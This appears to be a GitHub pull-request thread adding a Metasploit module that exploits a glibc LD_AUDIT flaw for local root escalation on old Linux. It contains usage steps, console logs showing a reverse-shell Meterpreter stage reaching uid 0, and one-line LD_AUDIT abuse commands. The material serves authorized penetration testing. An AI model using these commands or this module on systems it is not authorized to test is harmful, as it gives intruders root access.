Add glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation exploit

[bcoles]

Add glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation exploit.

    This module attempts to gain root privileges on Linux systems by abusing
    a vulnerability in the GNU C Library (glibc) dynamic linker.

    glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
    properly restrict use of the LD_AUDIT environment variable when loading
    setuid executables. This allows loading arbitrary shared objects from
    the trusted library search path with the privileges of the suid user.

    This module uses LD_AUDIT to load the libpcprofile.so shared object,
    distributed with some versions of glibc, and leverages arbitrary file
    creation functionality in the library constructor to write a root-owned
    world-writable file to a system trusted search path (usually /lib).
    The file is then overwritten with a shared object then loaded with
    LD_AUDIT resulting in arbitrary code execution.

    This module has been tested successfully on glibc version 2.11.1 on
    Ubuntu 10.04 x86_64.

    RHEL 5 and Debian 5 are reportedly affected, but untested. Some glibc
    distributions do not contain the vulnerable libpcprofile.so library.

Verification

• Start msfconsole
• Get a session
• use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
• set SESSION <ID>
• run
• Verify you get a root session

Example Output

msf5 exploit(multi/handler) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc 
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.244:4444 
[+] The target appears to be vulnerable
[*] Using target: Linux x64
[*] Writing '/tmp/.GQh1C8euY' (1913 bytes) ...
[*] Writing '/tmp/.3l76zsoHT' (246 bytes) ...
[*] Writing '/tmp/.WSuOVyo' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (857352 bytes) to 172.16.191.149
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.149:45721) at 2018-01-27 23:59:36 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.149
OS           : Ubuntu 10.04 (Linux 2.6.32-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

[sempervictus]

You really like being root eh? :)
I wonder if there's a way to search onhost libs for the relevant function imports to make this work on targets lacking libpcprofile. Resolve imports or something, libs should be readable by unprivileged users.

[bcoles]

@sempervictus MSF linux local EoP needed some love.

As for on-host detection of libraries - Tavis discusses some techniques to find libraries with constructors programmatically using objdump / gdb. However, the library would need to be disassembled, or the source code reviewed, to find a suitable attack vector.

From Tavis' advisory:

[...] can be exploited by locating a DSO in the trusted search path with
initialization code that has not been designed to operate safely while euid !=
uid.

Disassembling and analyzing potentially viable libraries programmatically on-host on-the-fly without access to the application source code would be cool, but well beyond the scope of this PR.

Instead, additional known-vulnerable libraries could be added to the module as targets in the future.

---

Tavis pointed out liblftp-tasks.so.0 can be used to create arbitrary directories:

LD_AUDIT="liblftp-tasks.so.0" LFTP_HOME=/etc/exploit ping

---

Similarly, Todor Donev pointed out that libmemusage.so, also distributed with glibc, is vulnerable in the same way as libpcprofile.so :

LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping

---

It seems that systems without libpcprofile.so were also missing libmemusage.so, so I simply opted for the former rather than support both.

[sempervictus]

On-target disassembly and analysis is probably something to bring up with @acammack-r7 in the context of mettle internals. Doesn't metasm have something for that?
I'm all for a vuln lib list we can grow over time.

[bcoles]

Delayed pending fix for #9482

[bcoles]

Leaving the delayed tag on this one. There's a bug when running this module on shell sessions I want to fix.

[bcoles]

Fixed bug with shell sessions on Debian. Ready for review.

[h00die]

Ubuntu 10.04 x64 (only openSSH added from iso install)

msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] GNU C Library version 2.11.1 is vulnerable
[*] Checking for libpcprofile.so in system search paths
[+] Found libpcprofile.so in /lib
[+] /bin/ping is setuid
[+] The target appears to be vulnerable
[*] System architecture is x86_64
[*] Using target: Linux x64
[*] Writing '/tmp/.bOC5g5P' (1913 bytes) ...
[*] Max line length is 65537
[*] Writing 1913 bytes in 1 chunks of 4369 bytes (octal-encoded), using printf
[*] Writing '/tmp/.7NCrLfnfk' (239 bytes) ...
[*] Max line length is 65537
[*] Writing 239 bytes in 1 chunks of 846 bytes (octal-encoded), using printf
[*] Writing '/tmp/.zSNpezl' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 2.2.2.2

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : ubuntu10.04
OS           : Ubuntu 10.04 (Linux 2.6.32-21-server)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

[h00die]

also worked from meterp shell

[h00die]

Release Notes

The exploits/linux/local/glibc_ld_audit_dso_load_priv_esc module has been added to the framework. This module abuses a vulnerability in the GNU C Library (glibc) dynamic linker on Ubuntu 10.04 and other similar age operating systems for local privilege escalation.

[h00die]

Nice work, i was mainly worried i wouldn't be able to get the vuln software, but Ubuntu 10.04 was good to go from ISO.

[bcoles]

Thanks @h00die